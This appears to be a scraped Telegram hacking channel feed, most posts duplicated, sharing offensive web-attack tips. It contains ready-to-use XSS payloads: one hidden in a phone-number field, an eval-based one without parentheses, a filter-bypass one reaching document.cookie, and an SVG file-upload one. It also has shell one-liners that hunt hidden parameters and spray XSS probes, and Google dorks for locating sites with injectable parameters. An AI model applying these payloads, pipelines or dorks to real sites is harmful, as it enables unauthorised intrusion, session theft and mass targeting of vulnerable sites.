i upload this video.. How to ssrf vulnerability in next.js.. Video link:
https://www.facebook.com/share/v/cRfk7SdqbJfCSUR3/
https://www.facebook.com/share/v/cRfk7SdqbJfCSUR3/
❤14🔥2🥰2👍1
recon.txt
4.3 KB
Well I haven't been posting youtube videos for a while because I've been doing some case studies on Advanced Recon. Because I have been less active online for some reason. Some of my subscribers have said that the file is called Recon.Text. I gave my telegram to give the file to them
❤29👍5🔥4🥰1
XSS from javascript hidden params
assetfinder *.com | gau | egrep -v '(.css|.svg)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'); echo -e "\e[1;33m$url\n\e[1;32m$vars"❤8👍4👎4🔥4💩1
𝐗𝐒𝐒 𝐢𝐧 𝐏𝐡𝐨𝐧𝐞 𝐍𝐮𝐦𝐛𝐞𝐫 𝐅𝐢𝐞𝐥𝐝 ? 👇
Recently I re-watched the NahamCon2022EU: RTFR (Read The Bleeping RFC) by securinti
One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.
How is that possible?
According to the RFC it is possible to append "optional parameter" to the number. Something like:
• 10203040;𝐞𝐱𝐭=+22
• 10203040;𝐢𝐬𝐮𝐛=12345
• 10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=𝐞𝐱𝐚𝐦𝐩𝐥𝐞
This can lead to XSS if:
1. The library parses phone numbers according to RFC and accepts optional parameters such as "phone-context"
2. The phone number is reflected on the web interface without input validation or output encoding
So payloads like "10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐢𝐩𝐭>𝐚𝐥𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐢𝐩𝐭>" CAN be a valid phone number and trigger XSS
Recently I re-watched the NahamCon2022EU: RTFR (Read The Bleeping RFC) by securinti
One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.
How is that possible?
According to the RFC it is possible to append "optional parameter" to the number. Something like:
• 10203040;𝐞𝐱𝐭=+22
• 10203040;𝐢𝐬𝐮𝐛=12345
• 10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=𝐞𝐱𝐚𝐦𝐩𝐥𝐞
This can lead to XSS if:
1. The library parses phone numbers according to RFC and accepts optional parameters such as "phone-context"
2. The phone number is reflected on the web interface without input validation or output encoding
So payloads like "10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐢𝐩𝐭>𝐚𝐥𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐢𝐩𝐭>" CAN be a valid phone number and trigger XSS
👍11👏3❤2😱1🤮1
⚡️Google Dorks - Vulnerable Parameters ⚡️
⛔️XSS prone parameters:
inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com
⛔️Open Redirect prone parameters
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example[.]com
⛔️SQLi Prone Parameters
inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com
⛔️SSRF Prone Parameters
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com
⛔️LFI Prone Parameters
inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com
⛔️RCE Prone Parameters
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com
🔆 Credit- Mike Takashi
⛔️XSS prone parameters:
inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= inurl:& site:example[.]com
⛔️Open Redirect prone parameters
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example[.]com
⛔️SQLi Prone Parameters
inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= | inurl:dir= inurl:& site:example[.]com
⛔️SSRF Prone Parameters
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= | inurl:domain= | inurl:page= inurl:& site:example[.]com
⛔️LFI Prone Parameters
inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= | inurl:inc= | inurl:locate= | inurl:doc= | inurl:conf= inurl:& site:example[.]com
⛔️RCE Prone Parameters
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com
🔆 Credit- Mike Takashi
👍15🔥4🥰3❤2💩1
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss🔥11👍3
XSS payload without ()
<svg onload="{hello:window . name instanceof{[Symbol.hasInstance]:eval}}">
<svg onload="{hello:window . name instanceof{[Symbol.hasInstance]:eval}}">
🔥5👍2
🚨🕷CVE-2017-7921🕷🚨
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
An Improper Authentication issue was discovered in Hikvision DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 build 160530, DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401, DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125, DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414, DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421, DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928, and DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106 devices. The improper authentication vulnerability occurs when an application does not adequately or correctly authenticate users. This may allow a malicious user to escalate his or her privileges on the system and gain access to sensitive information.
👍4❤3🔥1👏1
SQLi and Xss on Same program
Pyload: <svg onload=prompt%26%230000000040document.cookie)>
Pyload: <svg onload=prompt%26%230000000040document.cookie)>
❤9🔥3👏2👍1
Media is too big
VIEW IN TELEGRAM
I wanted to create a free blogger website. You will get many things for free on this site. Now I tested what I saw. Everyone can visit: https://shadowcyber51.blogspot.com/2024/10/test.html?m=1
🔥9🥰3👍2
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
Many file uploads allow SVGs and are prone to tampering.
<svg width="600" height="400" xmlns="w3.org/2000/svg" xmlns:xhtml="w3.org/1999/xhtml">
<foreignObject width="100%" height="100%">
<body xmlns="w3.org/1999/xhtml">
<iframe src='javascript:confirm(10)'></iframe>
</body>
</foreignObject>
</svg>
🔥12👏3👍1
Those who are interested in Android phone hacking can read this article
https://shorturl.at/x8jNs
https://shorturl.at/x8jNs
🔥7❤2👍1